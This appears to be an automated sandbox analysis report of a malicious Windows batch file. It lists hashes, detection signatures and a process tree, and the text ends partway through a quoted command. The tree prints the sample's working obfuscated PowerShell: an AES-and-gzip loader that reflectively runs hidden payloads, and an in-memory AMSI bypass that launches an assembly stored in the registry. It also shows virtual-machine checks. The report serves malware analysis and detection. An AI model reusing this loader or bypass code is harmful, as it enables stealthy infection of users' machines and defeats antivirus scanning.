Edit tour

Windows Analysis Report
1.cmd

Overview

General Information

Sample name:	1.cmd
Analysis ID:	1525388
MD5:	19fc666f7494d78a55d6b50a0252c214
SHA1:	8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256:	e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

.NET source code contains process injector

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Creates an autostart registry key pointing to binary in C:\Windows

Creates autostart registry keys with suspicious names

Creates autostart registry keys with suspicious values (likely registry only malware)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs a global keyboard hook

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Obfuscated command line found

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sets debug register (to hijack the execution of another thread)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential WinAPI Calls Via CommandLine

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Powerup Write Hijack DLL

Suspicious command line found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Powershell Execute Batch Script

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6112 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 1816 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 1072 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

WMIC.exe (PID: 1740 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 2700 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 1072 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 3852 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

WerFault.exe (PID: 7300 cmdline: C:\Windows\system32\WerFault.exe -u -p 3852 -s 2212 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cmd.exe (PID: 7740 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7788 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7804 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7904 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7960 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 7980 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

WMIC.exe (PID: 8040 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 8056 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 8176 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 8184 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

WerFault.exe (PID: 7392 cmdline: C:\Windows\system32\WerFault.exe -u -p 8184 -s 2036 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 2756 cmdline: C:\Windows\system32\WerFault.exe -u -p 8184 -s 2248 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

schtasks.exe (PID: 3620 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7544 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7528 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 5948 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QuvobnauGMMc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uwMlljVVwbVUVD,[Parameter(Position=1)][Type]$qJfzFIqcrY)$WLjbMWfHUpI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+'l'+''+[Char](101)+'c'+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+'a'+[Char](116)+'eTy'+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+'n'+'s'+[Char](105)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$WLjbMWfHUpI.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uwMlljVVwbVUVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');$WLjbMWfHUpI.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'ubl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'ew'+'S'+''+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+'i'+'rt'+'u'+''+[Char](97)+''+[Char](108)+'',$qJfzFIqcrY,$uwMlljVVwbVUVD).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');Write-Output $WLjbMWfHUpI.CreateType();}$ulnmlpDbsuVQN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+'o'+'s'+[Char](111)+'f'+[Char](116)+''+[Char](46)+'Wi'+'n'+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+'a'+'t'+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+'h'+''+'o'+'ds');$skqIwPbTYxVYhD=$ulnmlpDbsuVQN.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'dr'+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+'c,'+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SlSshRHzgoUjvXmeTqL=QuvobnauGMMc @([String])([IntPtr]);$KUNWcDgsbwBzyQuTTnSbbx=QuvobnauGMMc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YxZiZRJBAeC=$ulnmlpDbsuVQN.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+'l'+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')));$vMVwdwXXnratZh=$skqIwPbTYxVYhD.Invoke($Null,@([Object]$YxZiZRJBAeC,[Object]('L'+[Char](111)+''+'a'+''+'d'+'L'+[Char](105)+''+'b'+'r'+'a'+'r'+[Char](121)+''+[Char](65)+'')));$jdkLVqxnIKypBMyTV=$skqIwPbTYxVYhD.Invoke($Null,@([Object]$YxZiZRJBAeC,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+'t')));$NDrexjH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vMVwdwXXnratZh,$SlSshRHzgoUjvXmeTqL).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$awqsGjGjEpzNvinnA=$skqIwPbTYxVYhD.Invoke($Null,@([Object]$NDrexjH,[Object](''+'A'+'ms'+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+'e'+'r'+'')));$JhEQuEJeuH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jdkLVqxnIKypBMyTV,$KUNWcDgsbwBzyQuTTnSbbx).Invoke($awqsGjGjEpzNvinnA,[uint32]8,4,[ref]$JhEQuEJeuH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$awqsGjGjEpzNvinnA,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jdkLVqxnIKypBMyTV,$KUNWcDgsbwBzyQuTTnSbbx).Invoke($awqsGjGjEpzNvinnA,[uint32]8,0x20,[ref]$JhEQuEJeuH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+'r'+[Char](98)+''+'x'+''+[Char](45)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dllhost.exe (PID: 1244 cmdline: C:\Windows\System32\dllhost.exe /Processid:{33f9b6db-472d-4fae-86c7-d938bf69b9c0} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

WMIADAP.exe (PID: 6644 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)

svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1652 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 3852	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x15b820:$b2: ::FromBase64String( 0x15b87e:$b2: ::FromBase64String( 0x1d42cc:$b2: ::FromBase64String( 0x1d5758:$b2: ::FromBase64String( 0x1d6580:$b2: ::FromBase64String( 0x1d65de:$b2: ::FromBase64String( 0x28a149:$b2: ::FromBase64String( 0x28a1a7:$b2: ::FromBase64String( 0x28ac3a:$b2: ::FromBase64String( 0x28ac98:$b2: ::FromBase64String( 0x1545bc:$s1: -join 0x1e9e48:$s1: -join 0x1f6f1d:$s1: -join 0x1fa2ef:$s1: -join 0x1fa9a1:$s1: -join 0x1fc492:$s1: -join 0x1fe698:$s1: -join 0x1feebf:$s1: -join 0x1ff72f:$s1: -join 0x1ffe6a:$s1: -join 0x1ffe9c:$s1: -join
Process Memory Space: powershell.exe PID: 8184	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2a065:$b2: ::FromBase64String( 0x2a0c3:$b2: ::FromBase64String( 0xa2b27:$b2: ::FromBase64String( 0xa9a99:$b2: ::FromBase64String( 0xa9af7:$b2: ::FromBase64String( 0xb0222:$b2: ::FromBase64String( 0x22e18:$s1: -join 0xcc148:$s1: -join 0xd7af4:$s1: -join 0x249b4:$s3: Reverse 0xafeef:$s3: Reverse 0x1d84d:$s4: += 0x1d8ef:$s4: += 0x21037:$s4: += 0x22aed:$s4: += 0x22d03:$s4: += 0x22dfa:$s4: += 0xcd680:$s4: += 0xcfeab:$s4: += 0xcff2a:$s4: += 0xd0145:$s4: +=

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression 